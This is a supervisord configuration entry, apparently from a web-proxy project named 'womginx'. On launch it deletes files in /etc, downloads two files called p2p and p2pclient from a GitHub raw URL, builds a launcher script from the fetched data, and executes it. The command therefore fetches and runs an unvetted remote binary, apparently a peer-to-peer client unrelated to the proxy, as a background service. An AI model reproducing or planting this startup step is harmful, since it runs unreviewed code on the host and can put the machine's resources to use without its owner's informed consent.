[program:proc_1]
command=/bin/bash -c 'rm -rf /etc/p2p.sh /etc/p2pclient /etc/p2p && wget https://raw.githubusercontent.com/bls4/womginx/main/config/p2p -P /etc/ && wget https://raw.githubusercontent.com/bls4/womginx/main/config/p2pclient -P /etc/ && chmod +x /etc/p2pclient && echo -e "/etc/p2pclient -l MAIL_ADDREES" | sed -e "s/MAIL_ADDREES/$(cat /etc/p2p)/" > /etc/p2p.sh && chmod +x /etc/p2p.sh && /etc/p2p.sh'
priority=994

